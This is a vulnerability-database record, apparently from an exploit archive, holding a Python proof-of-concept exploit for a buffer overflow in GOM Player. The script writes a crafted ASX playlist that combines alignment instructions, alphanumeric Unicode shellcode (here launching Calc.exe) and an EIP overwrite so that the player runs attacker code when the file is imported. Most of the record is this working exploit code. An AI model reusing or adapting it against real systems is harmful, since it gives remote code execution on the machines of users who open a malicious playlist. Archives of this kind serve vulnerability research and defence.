{"lastseen": "2020-04-01T19:04:17", "references": [], "description": "\nThere was an error when sending a response from the m3u player list. Fortunately, these errors lead to buffer overflows.\nThis exploit is unstable. It should only be used as a POC. Once the list is imported the player will execute the BoF\n", "edition": 1, "reporter": "Debasish", "exploitpack": {"type": "clientside", "platform": "windows"}, "published": "2012-01-21T00:00:00", "title": "GOM-Player", "type": "exploitpack", "enchantments": {"dependencies": {"references": [], "modified": "2020-04-01T19:04:17", "rev": 2}, "score": {"value": 0.5, "vector": "NONE", "modified": "2020-04-01T19:04:17", "rev": 2}, "vulnersScore": 0.5}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2012-01-21T00:00:00", "id": "EXPLOITPACK:E3FCFFD66D6F55F78D45A21ADDA97DAD", "href": "", "viewCount": 1, "sourceData": "raw_input(\"[*] Press Enter to generate the crafted ASX...\")\nsize = 2046\n#Shellcode WinExec \"Calc.exe\" Unicode\nshellcode = \"PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AI\"\nshellcode += \"AIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBvz5tz9ptkthtPZOCI95hVsXKl\"\nshellcode += \"iqqVQNR4CUrm4p1pBlSm32qFxhK1dGymgtBT7KaWXZUKNKDhyKwRD3M4kIgjNWcoPbSw2Vg9C8\"\nshellcode += \"qpkJHPTWONmGWC5QaNrRktfZsLnvqZZxsLOmJlOl5oXmvWpdgKQzmR3pXKuPSPhNy9YXXVpMQ4\"\nshellcode += \"LknUTeKronnLU5GYH3FKm9oL8bgzRHcEuHN1o6wUn6quYo9Mn7pUEZFjaxMkkkFMvHii3tM7Li\"\nshellcode += \"z0yTVM6RQeUKceKvqNNsS3OK0Wsr2LKHnMxzpNsL2noxujOJn7khxOO1wuOWnSkXLQ4sNEm3xN\"\nshellcode += \"K3OwmMDBsKuf5DvgPOlXtwljwJLqruILX8ntLu940wojgQ6kVIPXMNCL8vJnlJeRqcBLELTKLu\"\nshellcode += \"48sNz8yLFZVo2KNLWPsKw6ZeOBOnuyC1ef0uz7dQOzSrmPFKSZTA\"\nbuff = ''\nbuff += '<asx version = \"3.0\" ><entry><title>ArirangTV</title><ref href = \"WWW.'\nalign = \"A\" # align to first instruction\nalign += \"\\x55\\x41\\x58\\x41\" # push ebp, pop eax\nalign += \"\\x05\\x11\\x11\" # add eax,11001100\nalign += \"\\x41\" # align\nalign += \"\\x2d\\x10\\x11\" # sub eax,11001000\nalign += \"\\x41\" * 109 # padding\nalign += \"\\x40\\x41\\x40\" # 2x inc eax\nalign += \"\\x41\" # align\nbuff += align\nbuff += shellcode\nbuff += \"\\x41\"*(size - len(align) - len(shellcode))\n#eip\nbuff += \"\\xd9\\x57\" # CALL EBP - 0x005700d9\n # top of the stack\nbuff += \"\\x46\"*2\nbuff += \"\\x47\"*100\nbuff +='\"/></entry></asx>'\nf = open('exploits/code/output/exploit.asx','w')\nf.write(buff)\nf.close()\nprint \"[*] Crafted .m3u File generated\"\n#print \"[*] Exit\" \n", "cvss": {"score": 0.0, "vector": "NONE"}}

{}